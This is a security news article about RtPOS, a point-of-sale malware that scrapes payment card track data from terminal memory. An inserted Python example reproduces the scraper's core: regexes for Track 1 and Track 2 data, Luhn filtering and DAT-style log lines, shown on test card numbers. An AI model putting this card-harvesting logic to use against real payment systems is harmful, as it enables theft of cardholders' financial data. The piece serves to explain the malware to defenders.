Security researchers at Booz Allen Hamilton recently discovered a point-of-sale malware that originated in 2017 but stayed under the radar for a long time thanks to obfuscation tactics employed by malware authors.
Point-of-sale (PoS) terminals used by restaurant and retail chains have often been found to be vulnerable to malware intrusions and brute-force attacks as many of them lack the necessary security protocols and encryption to ward off targeted cyber-attacks.
Considering that PoS terminals can be exploited by hackers to gain personal and financial information of thousands of customers and also to steal gift cards and shopping points, they are the favourite hunting grounds for online fraudsters and cyber criminals who are in the business to make money.
In March this year, point-of-sale terminals at several Applebee's restaurants operated by RMH Franchise Holdings suffered a breach that compromised guests' names, credit or debit card numbers, expiration dates and card verification codes processed during limited time periods.
In May, international restaurant chain Brinker International announced that payment systems at several Chili’s restaurants were hacked into by fraudsters between March and April this year, resulting in the breach of payment card information including credit or debit card numbers as well as cardholder names.
Russian PoS malware masquerading as a Windows file
According to researchers at Booz Allen Hamilton, the point-of-sale malware they discovered described itself as "Windows Logon Service", used the file name alohae.exe as an obfuscation tactic, and carried a Russian (RU) language code.
Dubbed RtPOS by the researchers, the malware is a memory scraper: it calls the Windows ReadProcessMemory API to read the address space of other processes on the compromised terminal, which lets it pick up payment card data while it still sits in RAM in the clear, before the point-of-sale software hands it to any encryption layer. The scraped memory is passed to a custom track-search routine that looks for Track 1 and Track 2 magnetic-stripe data, and each candidate card number is then checked with the Luhn checksum, the mod-10 check digit scheme used on payment card numbers, to discard false positives.
Once a scraped card number passes the Luhn check, the malware writes it to a DAT file it creates in the \Windows\SysWOW64 folder. Each entry in that DAT log contains the date and time, the name of the process that wrote the entry, and the payment card details.
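The scrape, validate and log pipeline described above, as an added illustration written for this page rather than code from RtPOS or from the Booz Allen analysis. It runs over a constructed byte buffer standing in for a POS process's memory (a real scraper would obtain that buffer via ReadProcessMemory), matches Track 1 and Track 2 layouts with regular expressions, keeps only PANs that pass the Luhn check, and formats a log line with the three fields the article says the DAT file holds. The PANs are published industry test numbers, and the process name and field separators are assumptions of the example; defenders can reuse the same matching logic to find track data in memory dumps of their own terminals.

```python
import re
from datetime import datetime, timezone

# Constructed sample "memory" of a hypothetical POS process: noise, one Track 1
# record, one Track 2 record whose PAN fails the Luhn check (a false positive a
# scraper must discard), and one valid Track 2 record.  All PANs are published
# test numbers, not real cards.
SAMPLE_MEMORY = (
    b"\x00\x00pos.exe heartbeat 2018-09-01\x00"
    b"%B4111111111111111^DOE/JANE^25121011000000000000?"
    b"\x00\x00garbage ;1234567890123456=25121011234? more"
    b";5500000000000004=26011011234567890?\x00\x00"
)

# Track 1 (format code B) and Track 2 layouts as laid out in ISO/IEC 7813:
# PAN, then cardholder name (Track 1 only), expiry YYMM, service code, and
# discretionary data terminated by '?'.
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})(\d{3})([^?]{0,79})\?")
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})([^?]{0,60})\?")


def luhn_valid(pan: str) -> bool:
    """Luhn mod-10 check: double every second digit from the right,
    subtract 9 from any doubled value above 9, and require the sum % 10 == 0."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scrape_tracks(buf: bytes) -> list[dict]:
    """Return the track records found in buf whose PAN passes the Luhn check."""
    found = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_valid(pan):
            found.append({"track": 1, "pan": pan,
                          "name": m.group(2).decode(), "exp": m.group(3).decode()})
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_valid(pan):
            found.append({"track": 2, "pan": pan, "exp": m.group(2).decode()})
    return found


def format_log_record(process_name: str, record: dict, when=None) -> str:
    """One log line in the style the article describes for the DAT file:
    timestamp, writing process, card data.  The '|' separator is an assumption."""
    when = when or datetime.now(timezone.utc)
    return (f"{when:%Y-%m-%d %H:%M:%S}|{process_name}"
            f"|T{record['track']}|{record['pan']}|{record['exp']}")


if __name__ == "__main__":
    # Hypothetical process name; in the real attack this would come from the
    # process whose memory was read.
    for rec in scrape_tracks(SAMPLE_MEMORY):
        print(format_log_record("pos.exe", rec))
```

The Luhn step is what makes a scraper practical: raw memory is full of digit runs, and the regexes alone would log every sixteen-digit counter or timestamp, so the checksum filters the candidates down to strings that are at least structurally card numbers.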
Not any ordinary point-of-sale malware
“RtPOS is unique in comparison to other fully featured POS malware like Project Hook and TreasureHunter, in that it has no native exfiltration capability. While other POS malware families are perfectly capable of sending captured Track1 and Track2 data to a C2 server, RtPOS merely saves the data locally,” the researchers noted.
“This is likely intended to reduce the network activity footprint of RtPOS and ensure the malware remains undetected for longer, thus earning the controllers a healthier profit. The RtPOS malware is also simplistic in features, largely automated in operation, and lacks many of the features that more mature POS malware families have.”
They added that the absence of a network exfiltration feature, of any interactive mode or operator commands, and of a dropper component indicates that the attackers must already have access to a targeted POS machine, both to execute the malware and to retrieve the captured information.
Since RtPOS seems more like a post-compromise tool instead of a standalone malware, it is also possible that it could be part of a larger tool set, they theorised.
“To protect consumers and companies from the fraud that can stem from a POS breach, companies transacting online need to change the paradigm. By implementing verification technologies such as passive biometrics and behaviour analytics, companies can verify customers beyond their credit card number, credentials, and any other data so they can be positively identified by their online behaviour,” said Ryan Wilk, vice president at NuData Security.
“This increased authentication as part of a layered security framework allows retailers to block fraudulent transactions even if the right passwords, credit card numbers, or security questions are used. It also allows them to correctly identify key customers to offer rewards, bonuses and more,” he added.